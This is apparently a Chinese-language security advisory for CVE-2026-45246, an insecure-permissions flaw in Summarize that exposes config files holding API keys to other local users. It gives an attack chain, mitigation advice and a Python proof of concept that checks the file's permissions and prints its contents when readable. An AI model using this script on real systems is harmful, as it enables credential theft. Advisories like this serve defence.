CVE-2026-45246 CVSS 5.5 中危

CVE-2026-45246 Summarize不安全文件权限漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45246

漏洞类型

信息泄露

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Summarize

漏洞概述

Summarize 0.15.1之前的版本在免刷新配置重写路径中存在不安全的文件权限漏洞。当程序重写配置文件时，未能保留原始文件的权限设置，而是使用默认的进程umask权限创建替代文件。这一缺陷导致包含API密钥和提供商凭证的配置文件在共享类Unix系统上暴露给其他本地用户，造成敏感信息泄露风险。

技术细节

该漏洞的根本原因在于Summarize应用程序在处理“免刷新配置重写”功能时，未能正确继承或复制原配置文件的权限模式。在标准的Unix-like系统环境中，当进程创建新文件时，若未显式指定权限，系统将应用当前的umask值（通常为022或027）来设置文件权限。这往往导致新文件对于同组用户或其他用户具有可读权限（如权限位644）。攻击者若拥有目标系统上的任意本地低权限账户，即可在Summarize重写配置文件后，直接读取该文件。由于配置文件中明文存储了各类API密钥及服务提供商的认证凭证，攻击者可利用这些凭证进一步接管相关服务的控制权。此漏洞属于典型的信息泄露问题，攻击复杂度低，无需用户交互即可完成。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者获取共享Unix-like系统上的低权限用户账号。

STEP 2

步骤2：监控配置文件变化

攻击者监控Summarize配置文件所在的目录，等待用户或系统触发配置重写操作。

STEP 3

步骤3：利用不安全权限读取文件

配置文件被重写后，由于使用了默认umask权限（如644），攻击者利用其本地用户权限读取该文件。

STEP 4

步骤4：窃取敏感凭证

攻击者从配置文件中提取API密钥和提供商凭证，进而接管相关外部服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-45246: Summarize Insecure File Permissions
# This script checks if the config file is readable by others due to insecure umask.

import os
import stat

CONFIG_PATH = "/path/to/summarize/config.yml"  # Replace with actual path

def check_vulnerability():
    if not os.path.exists(CONFIG_PATH):
        print(f"[!] Config file not found at {CONFIG_PATH}")
        return

    file_stat = os.stat(CONFIG_PATH)
    mode = file_stat.st_mode
    
    # Check if readable by group (S_IRGRP) or others (S_IROTH)
    is_group_readable = bool(mode & stat.S_IRGRP)
    is_other_readable = bool(mode & stat.S_IROTH)

    print(f"[*] File permissions: {oct(stat.S_IMODE(mode))}")

    if is_group_readable or is_other_readable:
        print("[+] Vulnerability confirmed! File is readable by unauthorized users.")
        try:
            with open(CONFIG_PATH, 'r') as f:
                print("[+] Content of the config file:")
                print(f.read())
        except Exception as e:
            print(f"[!] Error reading file: {e}")
    else:
        print("[-] File permissions appear secure (not readable by group/others).")

if __name__ == "__main__":
    check_vulnerability()

影响范围

Summarize < 0.15.1

防御指南

临时缓解措施

在未升级前，建议手动检查Summarize配置文件的权限，确保其设置为600（仅所有者可读写），并将配置文件放置在权限受限的目录中。此外，应限制非管理员用户对系统的本地访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表